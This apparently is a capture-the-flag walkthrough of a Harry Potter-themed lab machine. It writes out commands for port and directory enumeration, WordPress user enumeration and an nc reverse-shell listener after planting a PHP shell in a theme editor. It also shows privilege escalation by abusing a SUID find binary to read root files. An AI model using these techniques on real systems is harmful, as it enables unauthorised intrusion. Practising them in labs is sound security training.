I started by scanning the target machine for any open ports and services running on those ports using the Nmap tool.

So first, let’s decode the base64 string from http-title.
echo "dG9vIGVhc3kgbm8/IFBvdHRlcg=="|base64 -d
$>too easy no? Potter
Maybe a user…
I decided to check the website hosted on port 80. Let’s go see the source code, at the end we see this :

In /alohomora, we found this “Draco’s password is his house ;)”, the box is about Harry Potter so maybe we have draco:slytherin
Let’s make a Gobuster :
gobuster dir --url http://<IP>/--wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js,php,txt,html -t 100

We found a /log directory, let’s check it :

This is a base64 string, decode it : ilikesocks. Maybe a password, let’s not forget it.
The /DiagonAlley take us on a WordPress site. Obviously there is a message to decode. I think it’s a Brainfuck string. We use the site to decode it. It give a strange message : donn §. We will see after if it can help us but I think is a rabbit hole

Let’s start a new Gobuster a the WordPress.

Wee found some basic WordPress sites. We will be interested in /wp-admin
Since this is a WordPress site, we will do a Wpscan with the -e u option to enumerate users.
wpscan --url http://<IP>/DiagonAlley/ -e u

We can login on WordPress using user/pass that we found : Draco:slytherin
Now we upload a reverse shell on the section Apariencia>Editor de temas. Replace a page by a php reverse shell , start a listener and refresh the site
nc -nlvp 6666

Spawn a shell with the following command :
/usr/bin/script -qc /bin/bash /dev/null
With cd /home and ls, we found the user dobby.

In /home/dobby, open the flag1.txt with vi because cat doesn’t work on this box :
Now, let’s do this command to find all setuid/setgid file on the system
find / -type f -perm /6000 -ls 2>/dev/null
We found an interesting one, /usr/bin/find. Let’s check if there is some exploitation with this command on this great site. And we found one.
First, let’s enumerate the root folder :
find . -exec ls /root/ \; -quit;
There is a proof.txt, open it :
find . -exec more /root/proof.txt \; -quit;
And we have the root flag :
…well done